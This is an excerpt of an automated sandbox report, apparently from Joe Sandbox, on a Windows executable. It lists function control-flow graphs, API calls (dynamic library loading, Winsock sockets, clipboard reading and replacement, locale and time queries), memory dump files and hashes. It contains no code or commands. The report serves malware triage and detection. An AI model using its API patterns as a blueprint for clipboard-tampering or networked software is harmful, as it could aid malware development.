                                                                                                                                                                                                                                                                                                        control_flow_graph 14 4d7960-4d796e 15 4d7977-4d797a 14->15 16 4d7970-4d7976 14->16 17 4d797c-4d7984 15->17 18 4d7985-4d7995 LoadLibraryA 15->18 19 4d7ad8-4d7aeb 18->19 20 4d799b-4d7aac GetProcAddress * 19 18->20 20->19 22 4d7aae-4d7ab5 20->22 23 4d7ab7-4d7ab9 22->23 24 4d7ad2 22->24 23->24 25 4d7abb-4d7ad1 23->25 24->19
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                                                                                                                                                                        • API String ID: 0-3677570488
                                                                                                                                                                                                                                                                                                        • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94
                                                                                                                                                                                                                                                                                                        Function 004D9AB0 Relevance: 22.6, APIs: 15, Instructions: 136clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 689 4d9ab0-4d9ab7 690 4d9abd-4d9ac0 689->690 691 4d9c1c-4d9c1d 689->691 690->691 692 4d9ac6-4d9ad4 690->692 693 4d9ada-4d9aeb call 4b8000 692->693 694 4d9ba3-4d9ba5 692->694 699 4d9c19-4d9c1b 693->699 700 4d9af1-4d9b14 call 421380 GlobalAlloc 693->700 696 4d9ba8-4d9bad 694->696 696->696 698 4d9baf-4d9bc2 GlobalAlloc 696->698 698->699 701 4d9bc4-4d9bcb GlobalLock 698->701 699->691 707 4d9b2e-4d9b3f call 52b380 700->707 708 4d9b16-4d9b28 GlobalLock call 4b81c0 GlobalUnlock 700->708 702 4d9bd0-4d9bd8 701->702 702->702 704 4d9bda-4d9bdb GlobalUnlock 702->704 706 4d9be1-4d9be3 704->706 710 4d9be9-4d9bf3 OpenClipboard 706->710 711 4d9be5-4d9be7 706->711 716 4d9b41-4d9b6b WideCharToMultiByte GlobalAlloc 707->716 717 4d9b90-4d9ba1 call 439d00 707->717 708->707 710->699 714 4d9bf5-4d9c03 EmptyClipboard 710->714 711->699 711->710 718 4d9c0a-4d9c0c 714->718 719 4d9c05-4d9c08 SetClipboardData 714->719 720 4d9b6d-4d9b70 GlobalLock 716->720 721 4d9b87-4d9b8d call 439d00 716->721 717->706 722 4d9c0e-4d9c11 SetClipboardData 718->722 723 4d9c13 CloseClipboard 718->723 719->718 725 4d9b76-4d9b7e 720->725 721->717 722->723 723->699 725->725 728 4d9b80-4d9b81 GlobalUnlock 725->728 728->721
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3392129136-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                        • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                                                                                                                                                                        Function 004D9C20 Relevance: 7.5, APIs: 5, Instructions: 30clipboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 464010812-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                                                                                                                                                                        Function 004C9670 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C9674
                                                                                                                                                                                                                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 004C967B
                                                                                                                                                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,?,?,004D9D12,?,000000FF), ref: 004C9693
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentInfoKeyboardLayoutLocaleThread
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4094687451-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                                                                                                                                                                        • Instruction ID: c18c3e67b2d418a81a9ed34cd04b46ff7c576915d0efad72319c368f8fc6f991
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9E0E57A6003107BD601EB68BC09FAB77F8AB54B01F408419FA44C2280E338D90897FB
                                                                                                                                                                                                                                                                                                        Function 004CE5B0 Relevance: 3.0, APIs: 2, Instructions: 31timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemTime.KERNEL32(?,?,004CE646,?,0041E572), ref: 004CE5B7
                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(00563D90,?,?,004CE646,?,0041E572), ref: 004CE607
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Time$InformationSystemZone
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 702727434-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                                                                                                                                                                        • Instruction ID: 027c201d87c87fe04e998a3dacbc9da3b97e28b55a26ca5f2fa1b84a2cf7f3f2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9011D78608201DBC310BF09E85556BB7F9FB78B10FC0850AE48583321E3F68D88DB29
                                                                                                                                                                                                                                                                                                        Function 0052B440 Relevance: 2.5, APIs: 2, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00528C3A,-00000003), ref: 0052B447
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012F9), ref: 0052B44E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2d67d1c8230b34df0e9697497b7d0e8b3de7afbebdcce056a4f33b586f436b97
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61B092B9604200ABDE009BA0AE0CB1BB678AB54702F000400B619C1160C630C804EB31
                                                                                                                                                                                                                                                                                                        Function 004F9340 Relevance: 1.5, APIs: 1, Instructions: 35comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00549E88,00000000,00000001,0054A654,?,?,?,004FB325,?,?,00000000,7772E820), ref: 004F9365
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
